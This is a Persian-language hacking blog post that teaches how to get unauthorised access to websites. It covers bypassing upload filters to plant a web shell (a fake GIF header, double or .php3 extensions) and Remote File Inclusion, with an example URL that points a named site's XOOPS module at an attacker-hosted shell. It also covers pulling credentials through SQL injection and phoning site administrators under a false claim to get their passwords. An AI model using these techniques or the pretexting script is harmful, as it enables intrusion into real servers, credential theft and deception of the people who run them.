سلام دوستان عزيز .تو این پست روش های آپلود کردن در سايت يا سرور ميگيم .چندین روش برای به دست آوردن اکسس از سایت ها و سرورها وجود داره که اونارو به ترتیب براتون توضیح می دم !
1- آپلود شل از طریق بایپس ( Bypass ) کردن یا دور زدن آپلود سنتر
در این روش شما می تونید با روش ها و ترفندهای مختلفی یک آپلود سنتر رو دور بزنید یا در اصطلاح باپیسش کنید . مثلا با اضافه کردن کد GIF98;a به اول شل بعضی از آپلود سنتر ها گول می خورن و اجازه آپلود رو به شما می دن !
یک روش دیگه برای دور زدن آپلود سنتر ها وجود داره. اونم عوض کردن پسورد فایل هست . مثلا عوض کردن پسوند فایل php. به gif.php. ! که ممکنه دوباره آپلود سنتر بایپس بشه ! یا مثلا در یک سایت نوشته شما مجاز به آپلود پسوندهای زیر نیستید :
aspx , .asp , .php , .html , .htm. , ...
خوب حالا شما در اینجور آپلود سنترها به راحتی می تونید شل خودتونو با پسورد php3. آپلود کنید !!!
نمونه فيلم :
http://www.kamyab-hack.net/post-63.aspx
http://www.kamyab-hack.net/post-93.aspx
2- استفاده از باگ های RFI
خوب همون طور که می دونید RFI به معنی Remote File Inclusion هست ! در این جور باگها شما می تویند شل اسکریپت خودتونو به راحتی در سرور Run کنید ( بدون هیچ دردسری ) یک مثال براتون می زنم :
http://www.ipsjdps.org/XOOPS/modules/xfsection/modify.php?dir_module=Adress Shell
خوب همون طور که می بینید بعد از علامت مساوی ( = ) آدرس شلم رو به صورت فایل Txt که قیلا در فضای خودم آپلود کرده بودن بهش دادم ! که آخرش هم علامت سوال ( ؟ ) گذاشتم. دوستان حتما توجه داشته باشن که اگه علامت ? در آخر شل گذاشته نشه ، شل ران نمیشه !
نمونه فيلم :
http://www.kamyab-hack.net/post-83.aspx
3- استفاده از باگ های SQL Injection
شما یوزر و پسورد یک سایتی رو از طریق باگ Sql به دست آوردید . شما با يه سري دستورات مي تونيد يوزر و پسورد سايت را از ديتابيس بيرون بكشيد .
نمونه فيلم :
http://www.kamyab-hack.net/post-90.aspx
4- مهندسی اجتماعی
يكي از بهترين روش هاي هست كه شما اگه نتونستيد با روش هاي بالا اكسس از يه سايت بگيريد اين بهترين گزينه هست . براي نمونه من يكي ذكر مي كنم . اول مياد يه Whios از سايت ميگيرد خب ميبينيد 100 تا سايت رو سرور هست . حالا شما بيا تماس با يكي از مديران اين سايت جا ميزنيد كه ميگيد آقا مي خواهم كرنل سرور را آپديت كنم( الكي يه چيزي سرهم كنيد ) لطف كنيد يوزر و پسورد سايتتون بديد !!!
+ نوشته شده در جمعه شانزدهم بهمن 1388ساعت 20:22 توسط BenYamin
|